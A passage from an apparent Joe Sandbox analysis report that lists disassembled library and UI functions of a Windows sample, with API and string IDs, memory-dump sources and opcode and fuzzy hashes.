                                                                                • Opcode Fuzzy Hash: 6504a464ad744481ce6bc1c71c4353ab51ac4f53e5ce451b4dcbbfd06c50b848
                                                                                • Instruction Fuzzy Hash: 6F21F923A09BC281EBB49B3494905B9A650FB85774FA40335D67F877D4CE3CD492E310
                                                                                Function 00007FF79F91A0C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                • String ID: static
                                                                                • API String ID: 1983116058-2160076837
                                                                                • Opcode ID: 2cf77c951f50a5aa7b90eeaf8a6614b83960d367aa0043a5ee29e49d78538776
                                                                                • Instruction ID: f848dd7ac008139f10ca85a5ffaf99f7c9b27657164140ecbdfa180193356ff3
                                                                                • Opcode Fuzzy Hash: 2cf77c951f50a5aa7b90eeaf8a6614b83960d367aa0043a5ee29e49d78538776
                                                                                • Instruction Fuzzy Hash: F9310A32A087C18BE774DF29E444B9AB7A5F788760F504239DB9943B98DB38E855CF10
                                                                                Function 00007FF79F919868 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CreateObjectStockWindow
                                                                                • String ID: Combobox
                                                                                • API String ID: 1025951953-2096851135
                                                                                • Opcode ID: 64d9c3cb7b5de17515fad991fab36aed20c74e14fc7f9fd3c19d97b8fd4a0418
                                                                                • Instruction ID: ae4fd70ad4d0517bfb84a887e7bb2b741b60bbdc372ff6f39a4f088d77cefe45
                                                                                • Opcode Fuzzy Hash: 64d9c3cb7b5de17515fad991fab36aed20c74e14fc7f9fd3c19d97b8fd4a0418
                                                                                • Instruction Fuzzy Hash: F3311A326087C1CAE770DF25B444B9AB7A1F7857A0F504235EAA943B99CB3CD845CF10
                                                                                Function 00007FF79F919BD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: LengthMessageSendTextWindow
                                                                                • String ID: edit
                                                                                • API String ID: 2978978980-2167791130
                                                                                • Opcode ID: 7385061f885e14c89e765babf531e3acc6228f8566b1a940e972c4d460c7f125
                                                                                • Instruction ID: 0e932ad40f05076b1e1cec3bc0a600f935fa76b08371cf8584da8cbebae5a4ce
                                                                                • Opcode Fuzzy Hash: 7385061f885e14c89e765babf531e3acc6228f8566b1a940e972c4d460c7f125
                                                                                • Instruction Fuzzy Hash: EC311C35A08BC1CAE770DB25A44479AB7A1FB847A0F544235EA9D83B9CDB3CD885CB11
                                                                                Function 00007FF79F8AFD90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: _handle_error
                                                                                • String ID: "$pow
                                                                                • API String ID: 1757819995-713443511
                                                                                • Opcode ID: 2773d63829b6bc9e243f88705d039ab02ec385488ae35a30c1ce332e33ed45c5
                                                                                • Instruction ID: 50f62481bc5d6bd2a659b8ab222f6c26bac48adb13118b76ec1fddede6d46a85
                                                                                • Opcode Fuzzy Hash: 2773d63829b6bc9e243f88705d039ab02ec385488ae35a30c1ce332e33ed45c5
                                                                                • Instruction Fuzzy Hash: 28216172D2CAC587D3B0DF20E440ABAFAA0FBDA344F601325F6890AD55DBBDD155AB10
                                                                                Function 00007FF79F8DDDF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: ClassMessageNameSend
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 3678867486-1403004172
                                                                                • Opcode ID: 97deb16edf8e784fc52f0d006fa99df0b5c043f3f1d7c65ec9baf9ca6ee38585
                                                                                • Instruction ID: 1caf710c8111d0f60b9a110e4626483d65482d4e6c9b8b4fd93ad9d2667d1a2d
                                                                                • Opcode Fuzzy Hash: 97deb16edf8e784fc52f0d006fa99df0b5c043f3f1d7c65ec9baf9ca6ee38585
                                                                                • Instruction Fuzzy Hash: CD11F022A186C191FA60FB20D4406E9A3A0FB95BA0F844231DAAC477DADE3CD166CB50
                                                                                Function 00007FF79F8DDD48 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: ClassMessageNameSend
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 3678867486-1403004172
                                                                                • Opcode ID: d39c91620d6c6e447856c574b1c807ce734865e57223a48666476f59d2f3e294
                                                                                • Instruction ID: c231599a1f524534f2030fe683f502f28c3a3b3e69d0f0cc50f8430b65778bf3
                                                                                • Opcode Fuzzy Hash: d39c91620d6c6e447856c574b1c807ce734865e57223a48666476f59d2f3e294
                                                                                • Instruction Fuzzy Hash: B411E222A086C292FF70F720E450AF9A350FF95794FC44031DA9C47B8ADE2CD225DB10
                                                                                Function 00007FF79F8DDCA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: ClassMessageNameSend
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 3678867486-1403004172
                                                                                • Opcode ID: 2b6fed8ad632b1f274e203d646578af3038472905804e24f6343927dca18ccae
                                                                                • Instruction ID: 12647106331fe5295c81efa835f9797b4a746fb8a405dea2ce08008ba47e964f
                                                                                • Opcode Fuzzy Hash: 2b6fed8ad632b1f274e203d646578af3038472905804e24f6343927dca18ccae
                                                                                • Instruction Fuzzy Hash: 62119362A186C192FB70FB20E4516E9A360FF99794FC44431D68C47B59DE2CD615DB20
                                                                                Function 00007FF79F91FEA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateHandleProcess
                                                                                • String ID:
                                                                                • API String ID: 3712363035-3916222277
                                                                                • Opcode ID: 7b42f129ca5b2bc2214f050bb36978d190a1a5278d42b1070c82c133f3bdff27
                                                                                • Instruction ID: 3781622c2e6c2b57cc7567fe4f1350052470994f6f66a45a11ae992ee3f3edd7
                                                                                • Opcode Fuzzy Hash: 7b42f129ca5b2bc2214f050bb36978d190a1a5278d42b1070c82c133f3bdff27
                                                                                • Instruction Fuzzy Hash: 40114F31A1CA858AE720AF22F8005AAB7A5FB847D4F854135DA4987B69CF3CE094CB10
                                                                                Function 00007FF79F8DDEA8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: ClassMessageNameSend
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 3678867486-1403004172
                                                                                • Opcode ID: 2fa39eb79566fbbf5ef709d97066772d08e715fc924eaba82c6fe28b878daa18
                                                                                • Instruction ID: 4e3fb28ca44aa889ea4e5f1f84c22d126c91d533bbb432560d2b3e6335d6cf40
                                                                                • Opcode Fuzzy Hash: 2fa39eb79566fbbf5ef709d97066772d08e715fc924eaba82c6fe28b878daa18
                                                                                • Instruction Fuzzy Hash: 1201C422A2C5C291FA70F730E490AF99320FF95394FC44131E59D47A9ADE2CD228DB20
                                                                                Function 00007FF79F8B15B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: _ctrlfp_handle_error_raise_exc
                                                                                • String ID: !$tan
                                                                                • API String ID: 3384550415-2428968949
                                                                                • Opcode ID: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                                                • Instruction ID: e6b9cec1e07bdfc8cca2f555b3ac0a2a39b8b83b651ab15c674b2799e1763853
                                                                                • Opcode Fuzzy Hash: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                                                • Instruction Fuzzy Hash: A0019631A2CFC541DA64DF22A84077AA252FBDA7D4F504334EA5E0BB98EF7DD1509B00
                                                                                Function 00007FF79F8B14E8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: _ctrlfp_handle_error_raise_exc
                                                                                • String ID: !$cos
                                                                                • API String ID: 3384550415-1949035351
                                                                                • Opcode ID: 59a2c881f09cdb696690f699cc12801b637b051dbcc35695dacf0c08331e8fc0
                                                                                • Instruction ID: 81acc0c1d2527d1f11660f5f6e51f2a079caeeab1e165907fc0e7295b48758e3
                                                                                • Opcode Fuzzy Hash: 59a2c881f09cdb696690f699cc12801b637b051dbcc35695dacf0c08331e8fc0
                                                                                • Instruction Fuzzy Hash: 4901B571E28FC941D664DF2298407BAA252BF9A7D4F504334E95A0AB98EF7DD0605B00
                                                                                Function 00007FF79F8B14FC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: _ctrlfp_handle_error_raise_exc
                                                                                • String ID: !$sin
                                                                                • API String ID: 3384550415-1565623160
                                                                                • Opcode ID: 9c5650ba25f23863d1585264c289844e213b1bc1e7bffeede2023515f4cd1262
                                                                                • Instruction ID: 54ba6edf4d22d48aadb3ab4a718875ff8d37b410b4eb415e9834adf74870ecc5
                                                                                • Opcode Fuzzy Hash: 9c5650ba25f23863d1585264c289844e213b1bc1e7bffeede2023515f4cd1262
                                                                                • Instruction Fuzzy Hash: EE01B571E28FC541D664DF2298407BAA262BF9A7D4F504334E95A0AB98EF6DD0505B00
                                                                                Function 00007FF79F8B1370 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: _handle_error
                                                                                • String ID: "$exp
                                                                                • API String ID: 1757819995-2878093337
                                                                                • Opcode ID: 1dd5b4e450707440dd9d18b5c78d2e187119c4904f0596c8cb375bf303972248
                                                                                • Instruction ID: ff26e4e7c950bdec5d044c4bc168f48be9ac61c20fd7068eb02394e90d0306c0
                                                                                • Opcode Fuzzy Hash: 1dd5b4e450707440dd9d18b5c78d2e187119c4904f0596c8cb375bf303972248
                                                                                • Instruction Fuzzy Hash: 2A01A536A39E8882E230DF34D0456EAB7B0FFEA344F601315E7441AA64DB7DD4919B00
                                                                                Function 00007FF79F8975C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • try_get_function.LIBVCRUNTIME ref: 00007FF79F8975E9
                                                                                • TlsSetValue.KERNEL32(?,?,?,00007FF79F897241,?,?,?,?,00007FF79F89660C,?,?,?,?,00007FF79F894CD3), ref: 00007FF79F897600
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Valuetry_get_function
                                                                                • String ID: FlsSetValue
                                                                                • API String ID: 738293619-3750699315
                                                                                • Opcode ID: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
                                                                                • Instruction ID: 3fab92fde9e56334a7f8dc1f99dd6d688821e2c9268c30156a6933f54e30cff0
                                                                                • Opcode Fuzzy Hash: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
                                                                                • Instruction Fuzzy Hash: 59E06562A0C5C291EB666B75E8404F8A361AF48BA1FC94035D92E4A259CE3CE498D620
                                                                                Function 00007FF79F895620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF79F895629
                                                                                • _CxxThrowException.LIBVCRUNTIME ref: 00007FF79F89563A
                                                                                  • Part of subcall function 00007FF79F897018: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF79F89563F), ref: 00007FF79F89708D
                                                                                  • Part of subcall function 00007FF79F897018: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF79F89563F), ref: 00007FF79F8970BF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                                                • String ID: Unknown exception
                                                                                • API String ID: 3561508498-410509341
                                                                                • Opcode ID: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                                                • Instruction ID: f1fae93e448e85b0539a1d2e25699db744139a12d3e97748956c0f7e9ad4fc08
                                                                                • Opcode Fuzzy Hash: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                                                • Instruction Fuzzy Hash: FFD01226A149C5D1DE20FB14D8557D8E330F740308FD04431D14C815B5DF2CD64AE310